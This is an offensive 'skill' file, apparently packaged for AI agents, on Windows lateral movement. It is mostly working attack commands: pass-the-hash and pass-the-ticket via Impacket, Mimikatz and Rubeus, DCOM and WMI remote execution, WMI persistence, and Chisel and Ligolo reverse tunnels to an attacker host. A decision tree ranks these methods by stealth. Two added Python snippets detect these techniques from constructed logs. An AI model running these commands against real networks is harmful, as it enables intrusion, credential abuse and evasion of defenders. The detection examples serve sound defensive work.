windows-lateral-movement


INSTALLATION
npx skills add https://github.com/yaklang/hack-skills --skill windows-lateral-movement
Run in your project or agent environment. Adjust flags if your CLI version differs.

SKILL.md


Also load CREDENTIAL_DUMPING.md when you need:

  • LSASS dump techniques (MiniDump, comsvcs.dll, nanodump)
  • SAM/SYSTEM/SECURITY extraction
  • DPAPI, credential manager, cached domain credentials
  • NTDS.dit extraction methods

1. REMOTE EXECUTION METHODS COMPARISON

| Method | Port | Cred Type | Creates Service? | File on Disk? | OPSEC | Admin Required? |
|---|---|---|---|---|---|---|
| PsExec | 445 (SMB) | Password/Hash | Yes (PSEXESVC) | Yes (.exe) | Low | Yes |
| Impacket smbexec | 445 | Password/Hash | Yes (temp service) | No | Medium | Yes |
| Impacket atexec | 445 | Password/Hash | No (scheduled task) | No | Medium | Yes |
| WMI | 135+dynamic | Password/Hash | No | No | High | Yes |
| WinRM | 5985/5986 | Password/Hash/Ticket | No | No | High | Yes (Remote Mgmt) |
| DCOM | 135+dynamic | Password/Hash | No | No | High | Yes |
| RDP | 3389 | Password/Hash (RestrictedAdmin) | No | No | Low (GUI session) | RDP access |
| SSH | 22 | Password/Key | No | No | High | SSH enabled |
| SC | 445 | Password/Hash | Yes (custom service) | Yes | Low | Yes |

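The "Creates Service?" and "File on Disk?" columns are exactly what a defender keys on. The following is an added example, not code from the original cheat sheet: it turns those artifacts (7045 service install, PSEXESVC binary, cmd-one-liner ImagePath, 4698 scheduled task, Sysmon parent process) into detection rules over constructed event records; the record field names assume a normalised log pipeline.

```python
"""Fingerprint the remote-execution method from Windows event records.

Added example, not code from the original cheat sheet: it turns the comparison
table's artifacts into detection rules. Field names assume a normalised log
pipeline; the sample records are constructed, not real telemetry.
"""
import re

# smbexec-style service: nothing dropped to disk, ImagePath is a cmd one-liner
CMD_SERVICE = re.compile(r"(%COMSPEC%|cmd\.exe)\s+/Q\s+/c", re.I)
# Parent of the spawned shell identifies the transport (Sysmon Event ID 1)
PARENT_TO_METHOD = {
    "wmiprvse.exe": "WMI (wmiexec / Invoke-WmiMethod)",
    "wsmprovhost.exe": "WinRM (PowerShell remoting / evil-winrm)",
    "mmc.exe": "DCOM (MMC20.Application)",
    "psexesvc.exe": "PsExec (child of the PSEXESVC service)",
}

def classify(ev):
    """Return the method a single record points to, or None if nothing matches."""
    chan, eid = ev.get("channel"), ev.get("event_id")
    if chan == "System" and eid == 7045:       # Service Control Manager: new service
        if ev.get("service_name", "").upper() == "PSEXESVC":
            return "PsExec: PSEXESVC service with binary on disk"
        if CMD_SERVICE.search(ev.get("image_path", "")):
            return "smbexec: temporary service, no binary on disk"
        return "Unknown service install: review ImagePath"
    if chan == "Security" and eid == 4698:     # scheduled task created
        return "atexec: scheduled task created remotely"
    if chan == "Sysmon" and eid == 1:          # process creation
        parent = ev.get("parent_image", "").rsplit("\\", 1)[-1].lower()
        return PARENT_TO_METHOD.get(parent)

def triage(events):
    """Return (host, verdict) for every record classify() flags."""
    return [(ev.get("host", "?"), v) for ev in events if (v := classify(ev))]

SAMPLE_EVENTS = [   # constructed sample records
    {"host": "WS01", "channel": "System", "event_id": 7045,
     "service_name": "PSEXESVC", "image_path": r"C:\Windows\PSEXESVC.exe"},
    {"host": "WS02", "channel": "System", "event_id": 7045, "service_name": "SvcTmp",
     "image_path": r"%COMSPEC% /Q /c echo whoami ^> \\127.0.0.1\C$\__output 2^>^&1"},
    {"host": "WS03", "channel": "Security", "event_id": 4698, "task_name": r"\tmp"},
    {"host": "WS04", "channel": "Sysmon", "event_id": 1, "parent_image": r"C:\Windows\System32\wbem\WmiPrvSE.exe"},
    {"host": "WS05", "channel": "Sysmon", "event_id": 1, "parent_image": r"C:\Windows\explorer.exe"},
]

if __name__ == "__main__":
    for host, verdict in triage(SAMPLE_EVENTS):
        print(f"{host}: {verdict}")
```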
2. PSEXEC VARIANTS

Impacket PsExec

# With password

psexec.py DOMAIN/administrator:password@TARGET_IP

# With NTLM hash (pass-the-hash)

psexec.py -hashes :NTLM_HASH DOMAIN/administrator@TARGET_IP

# With Kerberos ticket

export KRB5CCNAME=admin.ccache

psexec.py -k -no-pass DOMAIN/administrator@target.domain.com

Impacket smbexec (Stealthier — No Binary Upload)

smbexec.py DOMAIN/administrator:password@TARGET_IP

smbexec.py -hashes :NTLM_HASH DOMAIN/administrator@TARGET_IP

Impacket atexec (Scheduled Task)

atexec.py DOMAIN/administrator:password@TARGET_IP "whoami"

atexec.py -hashes :NTLM_HASH DOMAIN/administrator@TARGET_IP "whoami"

Sysinternals PsExec

PsExec64.exe \\TARGET -u DOMAIN\administrator -p password cmd.exe

PsExec64.exe \\TARGET -s cmd.exe    & REM Run as SYSTEM (-s)

PsExec64.exe \\TARGET -accepteula -s -d cmd.exe /c "C:\temp\payload.exe"

3. WMI LATERAL MOVEMENT

# Impacket wmiexec

wmiexec.py DOMAIN/administrator:password@TARGET_IP

wmiexec.py -hashes :NTLM_HASH DOMAIN/administrator@TARGET_IP

# With Kerberos

export KRB5CCNAME=admin.ccache

wmiexec.py -k -no-pass DOMAIN/administrator@target.domain.com

# PowerShell WMI process creation

Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList "cmd.exe /c whoami > C:\temp\out.txt" -ComputerName TARGET -Credential $cred

# WMI event subscription persistence

$filterArgs = @{
    EventNamespace = 'root\cimv2'; Name = 'Updater';
    QueryLanguage = 'WQL';
    Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
}

$filter = Set-WmiInstance -Namespace root\subscription -Class __EventFilter -Arguments $filterArgs

4. WINRM LATERAL MOVEMENT

# evil-winrm (from Linux — with password)

evil-winrm -i TARGET_IP -u administrator -p password

# evil-winrm (with hash)

evil-winrm -i TARGET_IP -u administrator -H NTLM_HASH

# evil-winrm (with Kerberos)

evil-winrm -i target.domain.com -r DOMAIN.COM

# PowerShell remoting

$cred = Get-Credential

Enter-PSSession -ComputerName TARGET -Credential $cred

# Execute command remotely

Invoke-Command -ComputerName TARGET -Credential $cred -ScriptBlock { whoami }

# Multiple targets simultaneously

Invoke-Command -ComputerName TARGET1,TARGET2 -Credential $cred -ScriptBlock { hostname; whoami }

5. DCOM LATERAL MOVEMENT

Stealthy — uses legitimate COM objects, no service creation.

MMC20.Application

$com = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","TARGET"))

$com.Document.ActiveView.ExecuteShellCommand("cmd.exe",$null,"/c whoami > C:\temp\out.txt","7")

ShellWindows

$com = [activator]::CreateInstance([type]::GetTypeFromCLSID("9BA05972-F6A8-11CF-A442-00A0C90A8F39","TARGET"))

$item = $com.Item()

$item.Document.Application.ShellExecute("cmd.exe","/c whoami > C:\temp\out.txt","C:\Windows\System32",$null,0)

ShellBrowserWindow

$com = [activator]::CreateInstance([type]::GetTypeFromCLSID("C08AFD90-F2A1-11D1-8455-00A0C91F3880","TARGET"))

$com.Document.Application.ShellExecute("cmd.exe","/c calc.exe","C:\Windows\System32",$null,0)

Impacket dcomexec

dcomexec.py DOMAIN/administrator:password@TARGET_IP

dcomexec.py -hashes :NTLM_HASH DOMAIN/administrator@TARGET_IP -object MMC20

6. PASS-THE-HASH (PTH)

Use NTLM hash directly without knowing the plaintext password.

# CrackMapExec — spray/check admin access

crackmapexec smb TARGETS -u administrator -H NTLM_HASH

# Impacket tools (all support -hashes)

psexec.py -hashes :NTLM_HASH DOMAIN/user@TARGET

wmiexec.py -hashes :NTLM_HASH DOMAIN/user@TARGET

smbexec.py -hashes :NTLM_HASH DOMAIN/user@TARGET

# evil-winrm

evil-winrm -i TARGET -u user -H NTLM_HASH

# xfreerdp (Restricted Admin mode must be enabled)

xfreerdp /v:TARGET /u:administrator /pth:NTLM_HASH /d:DOMAIN

# Mimikatz PTH (spawns new process with injected creds)

sekurlsa::pth /user:administrator /domain:DOMAIN /ntlm:HASH /run:cmd.exe

Enable Restricted Admin for RDP PTH

# On target (requires admin): enable restricted admin

reg add HKLM\System\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d 0 /f

7. OVERPASS-THE-HASH (PASS-THE-KEY)

Convert NTLM hash → Kerberos TGT → pure Kerberos authentication.

# Request TGT with hash

getTGT.py DOMAIN/user -hashes :NTLM_HASH -dc-ip DC_IP

export KRB5CCNAME=user.ccache

# Or with AES256 key

getTGT.py DOMAIN/user -aesKey AES256_KEY -dc-ip DC_IP

# Use Kerberos for all subsequent tools

psexec.py -k -no-pass DOMAIN/user@target.domain.com

wmiexec.py -k -no-pass DOMAIN/user@target.domain.com

# Mimikatz overpass-the-hash

sekurlsa::pth /user:user /domain:DOMAIN /ntlm:HASH /run:powershell.exe

# New PowerShell session → klist shows Kerberos TGT

Advantage: Pure Kerberos auth avoids NTLM logging and detection.
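The caveat a defender would add: a TGT minted from an NTLM hash is requested with RC4-HMAC (Ticket Encryption Type 0x17 in Security Event ID 4768), so the Kerberos path is quiet on NTLM logs but visible as an encryption-type downgrade for AES-enabled accounts, and the -aesKey variant is caught instead by source-host baselining. The following is an added example, not code from the original cheat sheet; the record field names and sample records are constructed assumptions.

```python
"""Flag overpass-the-hash style TGT requests in Security Event ID 4768 records.

Added example, not from the original cheat sheet. A TGT obtained from an NTLM
hash (getTGT.py -hashes, sekurlsa::pth /ntlm) is requested with RC4-HMAC
(Ticket Encryption Type 0x17); accounts with AES keys normally get 0x12.
Record field names and the sample records below are constructed assumptions.
"""
RC4_HMAC = 0x17
ETYPE_NAMES = {0x11: "AES128", 0x12: "AES256", 0x17: "RC4-HMAC"}

def rc4_downgrades(events, aes_accounts):
    """Return successful 4768s where an AES-capable account got an RC4 TGT."""
    hits = []
    for ev in events:
        if ev.get("event_id") != 4768 or ev.get("result") != "0x0":
            continue                               # only issued tickets
        acct = ev.get("account", "").lower()
        if ev.get("etype") == RC4_HMAC and acct in aes_accounts:
            hits.append({"account": acct, "client_ip": ev.get("client_ip"),
                         "etype": ETYPE_NAMES[RC4_HMAC]})
    return hits

def unexpected_sources(events, baseline):
    """Return sorted (account, client_ip) pairs requested from a host outside
    the account's baseline. The -aesKey variant keeps etype 0x12 and passes
    the RC4 check, so source-host baselining is the complementary rule."""
    seen = set()
    for ev in events:
        if ev.get("event_id") != 4768:
            continue                               # failed requests count too
        acct = ev.get("account", "").lower()
        if ev.get("client_ip") not in baseline.get(acct, set()):
            seen.add((acct, ev.get("client_ip")))
    return sorted(seen)

SAMPLE_4768 = [   # constructed; result 0x0 = issued, 0x18 = pre-auth failed
    {"event_id": 4768, "account": "jdoe", "client_ip": "10.0.1.25", "etype": 0x12, "result": "0x0"},
    {"event_id": 4768, "account": "jdoe", "client_ip": "10.0.9.7", "etype": 0x17, "result": "0x0"},
    {"event_id": 4768, "account": "svc_backup", "client_ip": "10.0.9.7", "etype": 0x12, "result": "0x0"},
    {"event_id": 4768, "account": "legacy01", "client_ip": "10.0.1.40", "etype": 0x17, "result": "0x0"},
    {"event_id": 4768, "account": "jdoe", "client_ip": "10.0.9.7", "etype": 0x17, "result": "0x18"},
]
AES_ACCOUNTS = {"jdoe", "svc_backup"}            # accounts known to hold AES keys
BASELINE = {"jdoe": {"10.0.1.25"}, "svc_backup": {"10.0.2.10"}, "legacy01": {"10.0.1.40"}}

if __name__ == "__main__":
    print(rc4_downgrades(SAMPLE_4768, AES_ACCOUNTS))
    print(unexpected_sources(SAMPLE_4768, BASELINE))
```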

8. PASS-THE-TICKET

# Use existing .ccache ticket

export KRB5CCNAME=/path/to/admin.ccache

psexec.py -k -no-pass DOMAIN/admin@target.domain.com

# Mimikatz — inject .kirbi ticket

kerberos::ptt ticket.kirbi

# Verify

klist

# Rubeus

Rubeus.exe ptt /ticket:base64_blob

9. PIVOTING THROUGH COMPROMISED HOSTS

SSH Tunnel / Port Forward

# Dynamic SOCKS proxy through compromised host

ssh -D 1080 user@COMPROMISED_HOST

# Use with proxychains

# Local port forward (access internal service)

ssh -L 8888:INTERNAL_TARGET:445 user@COMPROMISED_HOST

Chisel (No SSH Needed)

# On attacker (server)

chisel server --reverse -p 8080

# On compromised host (client)

chisel client ATTACKER:8080 R:socks

# Creates SOCKS5 proxy on attacker's port 1080

Ligolo-ng (Modern, Fast)

# On attacker

ligolo-proxy -selfcert -laddr 0.0.0.0:11601

# On compromised host

ligolo-agent -connect ATTACKER:11601 -retry -ignore-cert

# In ligolo console

session          # Select agent

start            # Start tunnel

# Add route: sudo ip route add INTERNAL_SUBNET/24 dev ligolo

10. LATERAL MOVEMENT DECISION TREE

Have credentials / hash — need to move laterally
│
├── What credentials do you have?
│   ├── Plaintext password → any method
│   ├── NTLM hash → PTH methods (§6)
│   │   ├── Need stealthier? → Overpass-the-Hash first (§7)
│   │   └── Direct use → psexec/wmiexec/evil-winrm with -H
│   ├── Kerberos ticket → Pass-the-Ticket (§8)
│   └── AES key → Overpass-the-Hash with -aesKey (§7)
│
├── OPSEC priority?
│   ├── High stealth needed
│   │   ├── WMI (no file on disk, no service) → wmiexec (§3)
│   │   ├── DCOM (uses legitimate COM) → dcomexec (§5)
│   │   └── WinRM (PowerShell remoting) → evil-winrm (§4)
│   ├── Moderate stealth
│   │   ├── smbexec (no binary upload) (§2)
│   │   └── atexec (scheduled task, auto-cleanup) (§2)
│   └── Low stealth acceptable
│       ├── PsExec (reliable, creates service) (§2)
│       └── RDP (interactive GUI) (§6)
│
├── Need to pivot to internal network?
│   ├── SSH available → SSH tunnel / SOCKS (§9)
│   ├── No SSH → Chisel or Ligolo-ng (§9)
│   └── Multiple hops → chain SOCKS proxies
│
├── Target hardening?
│   ├── SMB signing required → WMI, WinRM, or DCOM
│   ├── WinRM disabled → WMI or DCOM
│   ├── Firewall blocks 135/445 → RDP or SSH
│   └── Restricted Admin disabled → no RDP PTH → use other methods
│
└── Need to dump creds on new host?
    └── Load CREDENTIAL_DUMPING.md